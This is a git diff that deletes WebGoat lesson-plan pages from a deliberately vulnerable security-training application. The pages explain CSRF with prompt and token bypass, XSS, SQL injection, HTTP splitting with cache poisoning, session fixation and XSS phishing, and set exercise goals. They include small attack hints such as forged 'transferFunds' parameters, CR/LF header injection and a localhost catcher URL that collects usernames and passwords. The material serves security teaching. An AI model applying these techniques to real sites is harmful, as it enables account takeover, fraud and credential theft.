diff --git a/src/main/webapp/lesson_plans/en/CsrfPromptByPass.html b/src/main/webapp/lesson_plans/en/CsrfPromptByPass.html
deleted file mode 100644
index 7a505f2ac..000000000
--- a/src/main/webapp/lesson_plans/en/CsrfPromptByPass.html
+++ /dev/null
@@ -1,33 +0,0 @@
-
-
Lesson Plan Title:CSRF User Prompt By-Pass
-
-
-
Concept / Topic To Teach:
-This lesson teaches how to perform CSRF attacks that by-pass user confirmation prompts.
-
-
-
-How the attacks works:
-
-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page
-that contains a 'forged request' to execute commands with the victim's credentials. Prompting
-a user to confirm or cancel the command might sound like a solution, but can be by-passed if
-the prompt is scriptable. This lesson shows how to by-pass such a prompt by issuing another
-forged request. This can also apply to a series of prompts such as a wizard or issuing multiple
-unrelated forged requests.
-
-
-
-
General Goal(s):
-
-Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple
-malicious requests: the first to transfer funds, and the second a request to confirm the prompt
-that the first request triggered. The URL should point to the CSRF lesson with an extra
-parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the
-left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever
-receives this email and happens to be authenticated at that time will have his funds transferred.
-When you think the attack is successful, refresh the page and you will find the green check on
-the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
diff --git a/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html b/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html
deleted file mode 100644
index b57ea6b83..000000000
--- a/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html
+++ /dev/null
@@ -1,38 +0,0 @@
-
-
Lesson Plan Title:CSRF Token Prompt By-Pass
-
-
-
Concept / Topic To Teach:
-This lesson teaches how to perform CSRF attacks on sites that use tokens to mitigate CSRF attacks, but are vulnerable to CSS attacks.
-
-
-
-How the attacks works:
-
-
-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into
-loading a page that contains a 'forged request' to execute commands with the
-victim's credentials.
-
-
Token-based request authentication mitigates these attacks. This technique
-inserts tokens into pages that issue requests. These tokens are required to
-complete a request, and help verify that requests are not scripted. CSRFGuard from OWASP uses
-this technique to help prevent CSRF attacks.
-
-
However, this technique can be by-passed if CSS vulnerabilities exist on the same site.
-Because of the same-origin browser policy, pages from the same domain can read content from
-other pages from the same domain.
-
-
-
General Goal(s):
-
-Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains a malicious
-request to transfer funds. To successfully complete you need to obtain a valid request token.
-The page that presents the transfer funds form contains a valid request token. The URL for the
-transfer funds page is the same as this lesson with an extra parameter "transferFunds=main". Load
-this page, read the token and append the token in a forged request to transferFunds. When you think
-the attack is successful, refresh the page and you will find the green check on the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
-
diff --git a/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html b/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html
deleted file mode 100644
index a54fd9ab9..000000000
--- a/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html
+++ /dev/null
@@ -1,24 +0,0 @@
-
-
Lesson Plan Title: How to Perform Cross Site Scripting
-(XSS)
-
-
Concept / Topic To Teach:
-
-It is always a good practice to scrub all inputs, especially those
-inputs that will later be used as parameters to OS commands, scripts,
-and database queries. It is particularly important for content that will
-be permanently stored somewhere. Users should not be able to create
-message content that could cause another user to load an undesirable
-page or undesirable content when the user's message is retrieved.
-
-XSS can also occur when unvalidated user input is used in an HTTP
-response. In a reflected XSS attack, an attacker can craft a URL with
-the attack script and post it to another website, email it, or otherwise
-get a victim to click on it.
-
-
General Goal(s):
-For this exercise, you will perform a stored XSS attack.
-You will also implement code changes in the database to defeat
-these attacks.
-
-
diff --git a/src/main/webapp/lesson_plans/en/DBSQLInjection.html b/src/main/webapp/lesson_plans/en/DBSQLInjection.html
deleted file mode 100644
index 879a1b92e..000000000
--- a/src/main/webapp/lesson_plans/en/DBSQLInjection.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lesson Plan Title: How to Perform SQL Injection
-
-
Concept / Topic To Teach:
-
-It is always a good practice to scrub all inputs, especially those
-inputs that will later be used as parameters to OS commands, scripts,
-and database queries. Users should not be able to alter the intent of
-commands that are executed on the server, in many cases as a privileged user.
-
-
General Goal(s):
-For this exercise, you will perform a SQL Injection attack.
-You will also implement code changes in the database to defeat
-these attacks.
-
-
diff --git a/src/main/webapp/lesson_plans/en/DOMInjection.html b/src/main/webapp/lesson_plans/en/DOMInjection.html
deleted file mode 100644
index 19c19ee0b..000000000
--- a/src/main/webapp/lesson_plans/en/DOMInjection.html
+++ /dev/null
@@ -1,23 +0,0 @@
-
-
Lesson Plan Title: How to Perform DOM Injection Attack.
-
-
-
Concept / Topic To Teach:
-How to perform DOM injection attacks.
-
-
-
-How the attacks works:
-
-Some applications specially the ones that uses AJAX manipulates and updates the DOM
-directly using javascript, DHTML and eval() method.
-An attacker may take advantage of that by intercepting the reply and try to inject some
-javascript commands to exploit his attacks.
-
-
General Goal(s):
-
-* Your victim is a system that takes an activation key to allow you to use it.
-* Your goal should be to try to get to enable the activate button.
-* Take some time to see the HTML source in order to understand how the key validation process works.
-
-
diff --git a/src/main/webapp/lesson_plans/en/DOMXSS.html b/src/main/webapp/lesson_plans/en/DOMXSS.html
deleted file mode 100644
index fb7008727..000000000
--- a/src/main/webapp/lesson_plans/en/DOMXSS.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Lesson Plan Title: DOM Based Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-
-The Document Object Model (DOM) presents an interesting problem from
-a security standpoint. It allows the content of a web page to be dynamically
-modified, but that can be abused by attackers during a malicious code injection. XSS,
-a type of malicious code injection, can occur when unvalidated user input is used directly
-to modify the content of a page on the client side.
-
-
General Goal(s):
-For this exercise, your mission is to use this vulnerability to inject
-malicious code into the DOM. Then in the last stage, you will correct
-the flaws in the code to address the vulnerability.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/DOS_Login.html b/src/main/webapp/lesson_plans/en/DOS_Login.html
deleted file mode 100644
index 941a89b49..000000000
--- a/src/main/webapp/lesson_plans/en/DOS_Login.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: Denial of Service from Multiple Logins
-
-
Concept / Topic To Teach:
-
-Denial of service attacks are a major issue in web applications. If the end user cannot conduct business or perform the service offered by the web application, then both time and money is wasted.
-
General Goal(s):
-This site allows a user to login multiple times. This site has a database connection pool that allows 2 connections. You must obtain a list of valid users and create a total of 3 logins.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/DangerousEval.html b/src/main/webapp/lesson_plans/en/DangerousEval.html
deleted file mode 100644
index f6190530c..000000000
--- a/src/main/webapp/lesson_plans/en/DangerousEval.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lesson Plan Title: Dangerous Use of Eval
-
-
Concept / Topic To Teach:
-
-It is always a good practice to validate all input on the server side. XSS can occur
-when unvalidated user input is reflected directly into an HTTP response. In this lesson, unvalidated
-user-supplied data is used in conjunction with a Javascript eval() call. In a reflected
-XSS attack, an attacker can craft a URL with the attack script and store it on another
-website, email it, or otherwise trick a victim into clicking on it.
-
-
General Goal(s):
-For this exercise, your mission is to come up with some input which, when run through eval,
-will execute a malicious script. In order to pass this lesson, you must 'alert()' document.cookie.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/Encoding.html b/src/main/webapp/lesson_plans/en/Encoding.html
deleted file mode 100644
index fcba2ddac..000000000
--- a/src/main/webapp/lesson_plans/en/Encoding.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Peform Basic Encoding
-
-
Concept / Topic To Teach:
-
-Different encoding schemes can be used in web applications for different reasons.
-
-
General Goal(s):
-This lesson will familiarize the user with different encoding schemes.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html b/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html
deleted file mode 100644
index 27a82e2cf..000000000
--- a/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
Lesson Plan Title: How to Bypass Fail Open Authentication
-
-
-
Concept / Topic To Teach:
-
- This lesson presents the basics for understanding the "fail open" condition regarding authentication. The security term, “fail open” describes a behavior of a verification mechanism. This is when an error (i.e. unexpected exception) occurs during a verification method causing that method to evaluate to true. This is especially dangerous during login.
-
-
General Goal(s):
- The user should be able to bypass the authentication check.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/ForcedBrowsing.html b/src/main/webapp/lesson_plans/en/ForcedBrowsing.html
deleted file mode 100644
index 2bf4fa6a4..000000000
--- a/src/main/webapp/lesson_plans/en/ForcedBrowsing.html
+++ /dev/null
@@ -1,21 +0,0 @@
-
-
Lesson Plan Title: How to Perform Forced Browsing Attacks.
-
-
-
Concept / Topic To Teach:
-How to Exploit Forced Browsing.
-
-
-
-How the attacks works:
-
-Forced browsing is a technique used by attackers to gain access to resources that are not referenced, but are nevertheless accessible.
-
-One technique is to manipulate the URL in the browser by deleting sections from the end until an unprotected directory is found
-
-
General Goal(s):
-
-* Your goal should be to try to guess the URL for the "config" interface.
-* The "config" URL is only available to the maintenance personnel.
-* The application doesn't check for horizontal privileges.
-
diff --git a/src/main/webapp/lesson_plans/en/ForgotPassword.html b/src/main/webapp/lesson_plans/en/ForgotPassword.html
deleted file mode 100644
index 06b2feb2f..000000000
--- a/src/main/webapp/lesson_plans/en/ForgotPassword.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Exploit the Forgot Password Page
-
-
Concept / Topic To Teach:
-
-Web applications frequently provide their users the ability to retrieve a forgotten password. Unfortunately, many web applications fail to implement the mechanism properly. The information required to verify the identity of the user is often overly simplistic.
-
General Goal(s):
-Users can retrieve their password if they can answer the secret question properly. There is no lock-out mechanism on this 'Forgot Password' page. Your username is 'webgoat' and your favorite color is 'red'. The goal is to retrieve the password of another user.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html b/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html
deleted file mode 100644
index dff0d945e..000000000
--- a/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: How to Exploit Hidden Fields
-
-
Concept / Topic To Teach:
-
-Developers will use hidden fields for tracking, login, pricing, etc.. information on a loaded page. While this is a convenient and easy mechanism for the developer, they often don't validate the information that is received from the hidden field. This lesson will teach the attacker to find and modify hidden fields to obtain a product for a price other than the price specified
-
-
General Goal(s):
-The user should be able to exploit a hidden field to obtain a product at an incorrect price.
-
-Try to purchase the HDTV for less than the purchase price, if you have not done so already.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/HowToWork.html b/src/main/webapp/lesson_plans/en/HowToWork.html
deleted file mode 100644
index d99f61dc2..000000000
--- a/src/main/webapp/lesson_plans/en/HowToWork.html
+++ /dev/null
@@ -1,68 +0,0 @@
-
-
How To Work With WebGoat
-
-Welcome to a brief overview of WebGoat.
-
-
Environment Information
-
-WebGoat uses the Apache Tomcat server but can run in any application server. It is configured to run on
-localhost although this can be easily changed, see the "Tomcat Configuration" section in the Introduction.
-
-
The WebGoat Interface
-
-
-1. Lesson Categories in WebGoat. Click on a Category to see specific Lessons.
-2. This will show the underlying Java source code.
-3. This will show the complete solution of the selected lesson.
-4. This will show goals and objectives of the lesson.
-5. This will show technical hints to solve the lesson.
-6. This shows the HTTP request data
-7. If you want to restart a lesson you can use this link.
-
Solve The Lesson
-
-Always start with the lesson plan. Then try to solve the lesson and if necessary,
-use the hints. The last hint is the solution text if applicable. If you cannot solve the lesson using the hints, you may view the
-solution for complete details.
-
-
Read And Edit Parameters/Cookies
-
-To read and edit parameters and cookies you need a local proxy like OWASP ZAP to intercept the HTTP request.
- More information on ZAP can be found in the "Useful Tools" section in the Introduction.
-
-
-
Configuring new WebGoat users
-
-WebGoat uses spring-security.xml to configure users.
-
-
-Usually WebGoat only requires logging in with the user:guest and password:guest.
- But maybe in laboratory you have made a setup with one server and a lot of
-clients. In this case you might want to have a user for every client,
- you will have to alter /WEB-INF/spring-security.xml to add additional users. We recommend not to use real passwords
-as the passwords are stored in plain text in this file!
-
-
Adding a new User
-
-Adding a user is straight forward. You can use the guest entry as an example. The added
-users should have the same role as the guest user. The new user/password will not show on the login page.
-Add lines like this to the /WEB-INF/spring-security.xml file:
-
Lesson Plan Title: How to Discover Clues in the HTML
-
-
-
Concept / Topic To Teach:
-
- Developers are notorious for leaving statements like FIXME's, TODO's, Code Broken, Hack, etc... inside the source code. Review the source code for any comments denoting passwords, backdoors, or something doesn't work right.
- Below is an example of a forms based authentication form. Look for clues to help you log in.
-
-
-
General Goal(s):
-The user should be able to bypass the authentication check.
diff --git a/src/main/webapp/lesson_plans/en/HttpBasics.html b/src/main/webapp/lesson_plans/en/HttpBasics.html
deleted file mode 100644
index f3321f295..000000000
--- a/src/main/webapp/lesson_plans/en/HttpBasics.html
+++ /dev/null
@@ -1,27 +0,0 @@
-
-
Lesson Plan Title: Http Basics
-
-
-
Concept / Topic To Teach:
- This lesson presents the basics for understanding the transfer of data between the browser and the web application.
-
-
-How HTTP works:
-
-All HTTP transactions follow the same general format. Each client request and server response has three parts: the request or response line, a header section and the entity body. The client initiates a transaction as follows:
-
- The client contacts the server and sends a document request
-
-
-
GET /index.html?param=value HTTP/1.0
- Next, the client sends optional header information to inform the server of its configuration and the document formats it will accept.
-
-
-After sending the request and headers, the client may send additional data. This data is mostly used by CGI programs using the POST method.
-
General Goal(s):
-
-Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP request.
-
-The user should become familiar with the features of WebGoat by manipulating the above
-buttons to view hints, show the HTTP request parameters, the HTTP request cookies, and the Java source code. You may also try using OWASP Zed Attack Proxy for the first time.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/HttpOnly.html b/src/main/webapp/lesson_plans/en/HttpOnly.html
deleted file mode 100644
index aea12470c..000000000
--- a/src/main/webapp/lesson_plans/en/HttpOnly.html
+++ /dev/null
@@ -1,26 +0,0 @@
-
-
Lesson Plan Title: HttpOnly Test
-
-
Concept / Topic To Teach:
-
-To help mitigate the cross site scripting threat, Microsoft has
-introduced a new cookie attribute entitled 'HttpOnly.' If this flag is
-set, then the browser should not allow client-side script to access the
-cookie. Since the attribute is relatively new, several browsers neglect
-to handle the new attribute properly.
-
-The purpose of this lesson is to test whether your browser supports the
-HTTPOnly cookie flag. Note the value of the
-unique2u
-cookie. If your browser supports HTTPOnly, and you enable it for a
-cookie, client side code should NOT be able to read OR write to that
-cookie, but the browser can still send its value to the server. Some
-browsers only prevent client side read access, but don't prevent write
-access.
-
-
-With the HTTPOnly attribute turned on, type
-"javascript:alert(document.cookie)" in the browser address bar. Notice
-all cookies are displayed except the unique2u cookie.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/HttpSplitting.html b/src/main/webapp/lesson_plans/en/HttpSplitting.html
deleted file mode 100644
index ac0906a93..000000000
--- a/src/main/webapp/lesson_plans/en/HttpSplitting.html
+++ /dev/null
@@ -1,34 +0,0 @@
-
-
Lesson Plan Title: How to Perform HTTP Splitting
-
-
-
Concept / Topic To Teach:
- This lesson teaches how to perform HTTP Splitting attacks.
-
-
-
-How the attack works:
-
-
The attacker passes malicious code to the web server together with normal input.
-A victim application will not be checking for CR (carriage return, also given by %0d or \r)
-and LF (line feed, also given by %0a or \n) characters. These characters not only give attackers control
-of the remaining headers and body of the response the application intends to send,
-but they also allows them to create additional responses entirely under their control.
-
The effect of an HTTP Splitting attack is maximized when accompanied with a Cache Poisoning. The goal of
-Cache Poisoning attack is to poison the cache of the victim by fooling the cache into believing that the page
-hijacked using the HTTP splitting is an authentic version of the server's copy.
-
The attack works by using the HTTP Splitting attack plus adding the Last-Modified: header and setting it
-to a future date. This forces the browser to send an incorrect If-Modified-Since request header on future requests.
-Because of this, the server will always report that the (poisoned) page has not changed, and the victim's browser
-will continue to display the attacked version of the page.
-
A sample of a 304 response is:
-
HTTP/1.1 304 Not Modified
-Date: Fri, 30 Dec 2005 17:32:47 GMT
-
-
-
General Goal(s):
-
-
This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.
-
Enter a language for the system to search by. You will notice that the application is redirecting your request to another resource on the server. You should be able to use the CR (%0d) and LF (%0a) characters to exploit the attack. Your goal should be to force the server to send a 200 OK. If the screen changed as an effect to your attack, just go back to the homepage. After stage 2 is exploited successfully, you will find the green check in the left menu.
-
-Sensitive data should never sent in plaintext! Often applications
-switch to a secure connection after the authorization. An attacker
-could just sniff the login and use the gathered information to
-break into an account. A good webapplication always takes care of
-encrypting sensitive data.
-
General Goal(s):
-See how easy it is to sniff a password in plaintext.
-Understand the advantages of encrypting the login data!
-
diff --git a/src/main/webapp/lesson_plans/en/JSONInjection.html b/src/main/webapp/lesson_plans/en/JSONInjection.html
deleted file mode 100644
index 4c72bd04f..000000000
--- a/src/main/webapp/lesson_plans/en/JSONInjection.html
+++ /dev/null
@@ -1,24 +0,0 @@
-
-
Lesson Plan Title: How to Perform JSON Injection
-
-
-
Concept / Topic To Teach:
-This lesson teaches how to perform JSON Injection Attacks.
-
-
-
-How the attacks works:
-
-JavaScript Object Notation (JSON) is a simple and effective lightweight data exchange format. JSON can be in a lot of forms such as arrays, lists, hashtables and other data structures.
-JSON is widely used in AJAX and Web2.0 application and is favored by programmers over XML because of its ease of use and speed.
-However, JSON, like XML is prone to Injection attacks. A malicious attacker can inject the reply from the server and inject some arbitrary values in there.
-
-
-
General Goal(s):
-
-* You are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code SEA.
-* Once you enter the three digit code of the airport, an AJAX request will be executed asking for the ticket price.
-* You will notice that there are two flights available, an expensive one with no stops and another cheaper one with 2 stops.
-* Your goal is to try to get the one with no stops but for a cheaper price.
-
-
diff --git a/src/main/webapp/lesson_plans/en/JavaScriptValidation.html b/src/main/webapp/lesson_plans/en/JavaScriptValidation.html
deleted file mode 100644
index 7819de2bf..000000000
--- a/src/main/webapp/lesson_plans/en/JavaScriptValidation.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lesson Plan Title: How to Bypass Client Side JavaScript Validation
-
-
Concept / Topic To Teach:
-
-Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application.
-
-
-
General Goal(s):
-For this exercise, the web site requires that you follow certain rules when you fill out a form. The user should be able to break those rules, and send the website input that it wasn't expecting.
-
-This website performs both client and server side validation. For this exercise, your job is to break the client side validation and send the
- website input that it wasn't expecting. You must break all 7 validators at the same time.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html b/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html
deleted file mode 100644
index 66293a95c..000000000
--- a/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-
Lesson Plan Title:
-
-
-
Concept / Topic To Teach:
-
Standards Addressed:
-
General Goal(s):
-
Specific Objectives:
-
Required Materials:
-
Anticipatory Set (Lead-In):
-
Step-By-Step Procedures:
-
Plan For Independent Practice:
-
Closure (Reflect Anticipatory Set):
-
Assessment Based On Objectives:
-
Extensions (For Gifted Students):
-
Possible Connections To Other Subjects:
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/LogSpoofing.html b/src/main/webapp/lesson_plans/en/LogSpoofing.html
deleted file mode 100644
index 105e38f54..000000000
--- a/src/main/webapp/lesson_plans/en/LogSpoofing.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Lesson Plan Title: How to Perform Log Spoofing.
-
-
-
Concept / Topic To Teach:
- This lesson teaches attempts to fool the human eye.
-
-
-
-How the attacks works:
-The attack is based on fooling the humane eye in log files. An attacker can erase his traces from the logs
-using this attack.
-
-
-
General Goal(s):
-
-* The grey area below represents what is going to be logged in the web server's log file.
-* Your goal is to make it like a username "admin" has succeeded into logging in.
-* Elevate your attack by adding a script to the log file.
-
diff --git a/src/main/webapp/lesson_plans/en/MultiLevelLogin1.html b/src/main/webapp/lesson_plans/en/MultiLevelLogin1.html
deleted file mode 100644
index b5bd6118d..000000000
--- a/src/main/webapp/lesson_plans/en/MultiLevelLogin1.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Lesson Plan Title: Multi Level Login 1
-
-
Concept / Topic To Teach:
-
-A Multi Level Login should provide a strong authentication.
-This is archived by adding a second layer. After having
-logged in with your user name and password you are asked
-for a 'Transaction Authentication Number' (TAN). This is
-often used by online banking. You get a list with a lots
-of TANs generated only for you by the bank. Each TAN is used only once.
-Another method is to provide the TAN by SMS. This has
-the advantage that an attacker can not get TANs provided
-by the user.
-
General Goal(s):
-In this Lesson you try to get around the strong authentication.
-You have to break into another account. The user name, password and a
-already used TAN is provided. You have to make sure
-the server accept the TAN even it is already used.
-
diff --git a/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html b/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html
deleted file mode 100644
index 3514b7148..000000000
--- a/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Lesson Plan Title: Multi Level Login 2
-
-
Concept / Topic To Teach:
-
-A Multi Level Login should provide a strong authentication.
-This is archived by adding a second layer. After having
-logged in with your user name and password you are asked
-for a 'Transaction Authentication Number' (TAN). This is
-often used by online banking. You get a list with a lots
-of TANs generated only for you by the bank. Each TAN is used only once.
-Another method is to provide the TAN by SMS. This has
-the advantage that an attacker can not get TANs provided
-by the user.
-
General Goal(s):
-In this lesson you have to try to break into another account.
-You have an own account for WebGoat Financial but you want to
-log into another account only knowing the user name of the victim
-to attack.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/NewLesson.html b/src/main/webapp/lesson_plans/en/NewLesson.html
deleted file mode 100644
index 234b170d8..000000000
--- a/src/main/webapp/lesson_plans/en/NewLesson.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
-
Create A WebGoat Lesson
-
-Adding lessons to WebGoat is very easy. If you have an idea that would be suitable
-for a new lesson, follow these few simple instructions to implement it:
Lesson Plan Title: How to Exploit "Off-by-One" Buffer Overflow Vulnerabilities
-
-
Concept / Topic To Teach:
-How to Exploit a Web Based "Off-by-One" Buffer Overflow.
-
-
-
How the attack works:
-
-Despite being more rare, buffer overflow vulnerabilities on the web occur when a tier of the application has insufficient memory allocated to deal with the data submitted by the user. Typically, such a tier would be written in C or a similar language.
-
-For the particular subset, namely, off-by-one overflows, this lesson focuses on the consequences of being able to overwrite the position for the trailing null byte.
-
-As a result, further information is returned back to the user, due to the fact that no null byte was found.
-
-
Lesson Goal(s):
-
-
Welcome to the OWASP Hotel! Can you find out which room a VIP guest is staying in?
-
-* Understand how a buffer overflow vulnerability can be triggered on a web application.
-* Understand what type of value lengths are likely to trigger a buffer overflow.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/PasswordStrength.html b/src/main/webapp/lesson_plans/en/PasswordStrength.html
deleted file mode 100644
index f700fb8fd..000000000
--- a/src/main/webapp/lesson_plans/en/PasswordStrength.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
Lesson Plan Title: Password Strength
-
-
Concept / Topic To Teach:
-
-Accounts are only as secure as their passwords. Most users have the same weak password everywhere. If you want to protect them against brute-force-attacks your application should have good requirements for passwords. The password should contain lower case letters, capitals, numbers and special characters. The longer the password, the better, consider using a passphrase instead. For
-more information see: OWASP proper password strength.
-
-
-
General Goal(s):
- For this exercise, your job is to test several passwords on https://howsecureismypassword.net/
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html b/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html
deleted file mode 100644
index 235bd2528..000000000
--- a/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Bypass a Path Based Access Control Scheme
-
-
Concept / Topic To Teach:
-
-In a path based access control scheme, an attacker can traverse a path by providing relative path information. Therefore an attacker can use relative paths to access files that normally are not directly accessible by anyone, or would otherwise be denied if requested directly.
-
-
General Goal(s):
-The user should be able to access a file that is not in the listed directory.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/Phishing.html b/src/main/webapp/lesson_plans/en/Phishing.html
deleted file mode 100644
index 9b0127d14..000000000
--- a/src/main/webapp/lesson_plans/en/Phishing.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lesson Plan Title: Phishing with XSS
-
-
Concept / Topic To Teach:
-
-It is always a good practice to validate all input on the server side.
- XSS can occur when unvalidated user input is used in an HTTP response.
- With the help of XSS you can do a Phishing Attack and add content to a page
- which looks official. It is very hard for a victim to determinate
- that the content is malicious.
-
-
General Goal(s):
-The user should be able to add a form asking for username
-and password. On submit the input should be sent
-to http://localhost/WebGoat/catcher?PROPERTY=yes &user=catchedUserName&password=catchedPasswordName
-
diff --git a/src/main/webapp/lesson_plans/en/ReflectedXSS.html b/src/main/webapp/lesson_plans/en/ReflectedXSS.html
deleted file mode 100644
index 9db959e07..000000000
--- a/src/main/webapp/lesson_plans/en/ReflectedXSS.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Lesson Plan Title: How to Perform Reflected Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-
-It is always a good practice to validate all input on the server side.
- XSS can occur when unvalidated user input is used in an HTTP response.
- In a reflected XSS attack, an attacker can craft a URL with the attack
- script and post it to another website, email it, or otherwise get a
- victim to click on it.
-
-
General Goal(s):
-For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script and do something bad.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html b/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html
deleted file mode 100644
index e852cbcba..000000000
--- a/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
Lesson Plan Title: How to Force Browser Web Resources
-
-
Concept / Topic To Teach:
-Applications will often have an administrative interface that allows privileged users access to functionality that normal users shouldn't see. The application server will often have an admin interface as well.
-
Standards Addressed :
-
General Goal(s):
-
-Try to access the administrative interface for WebGoat. You may also try to access the administrative interface for Tomcat. The Tomcat admin interface can be accessed via a URL (/admin) and will not count towards the completion of this lesson.
-
-
-
-In role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow obtain unauthorized roles.
-
-
General Goal(s):
-Your goal is to explore the access control rules that govern this site. Each role has permission to certain resources (A-F). Each user is assigned one or more roles. Only the user with the [Admin] role should have access to the 'F' resources. In a successful attack, a user doesn't have the [Admin] role can access resource F.
-
-
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queiries, even if the threat of SQL injection has been prevented in some other manner.
-
General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also implement code changes in the web application to defeat these attacks.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html b/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html
deleted file mode 100644
index b7db5d10e..000000000
--- a/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Lesson Plan Title: Same Origin Policy Protection
-
-
Concept / Topic To Teach:
-
-A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous
-calls from the client side to a server. However, as a security measure these requests may
-only be made to the server from which the client page originated.
-
-
General Goal(s):
-This exercise demonstrates the Same Origin Policy Protection. XHR requests
-can only be passed back to the originating server. Attempts to pass data to
-a non-originating server will fail.";
diff --git a/src/main/webapp/lesson_plans/en/SessionFixation.html b/src/main/webapp/lesson_plans/en/SessionFixation.html
deleted file mode 100644
index c7e70f3aa..000000000
--- a/src/main/webapp/lesson_plans/en/SessionFixation.html
+++ /dev/null
@@ -1,33 +0,0 @@
-
-
Lesson Plan Title: Session Fixation
-
-
-
Concept / Topic To Teach:
-How to steal a session with a 'Session Fixation'
-
-
-
-How the attacks works:
-
-A user is recognized by the server by an unique Session ID. If a
-user has logged in and is authorized he does not have to
-reauthorize when he revisits the application as the user is recognized
-by the Session ID. In some applications it is possible to deliver
-the Session ID in the Get-Request. Here is where the attack starts.
-
-An attacker can send a hyperlink to a victim with a chosen Session ID.
-This can be done for example by a prepared mail which looks like an
-official mail from the application administrator.
-If the victim clicks on the link and logs in he is authorized
-by the Session ID the attacker has chosen. The attacker
-can visit the page with the same ID and is recognized as the victim and
-gets logged in without authorization.
-
-
General Goal(s):
-
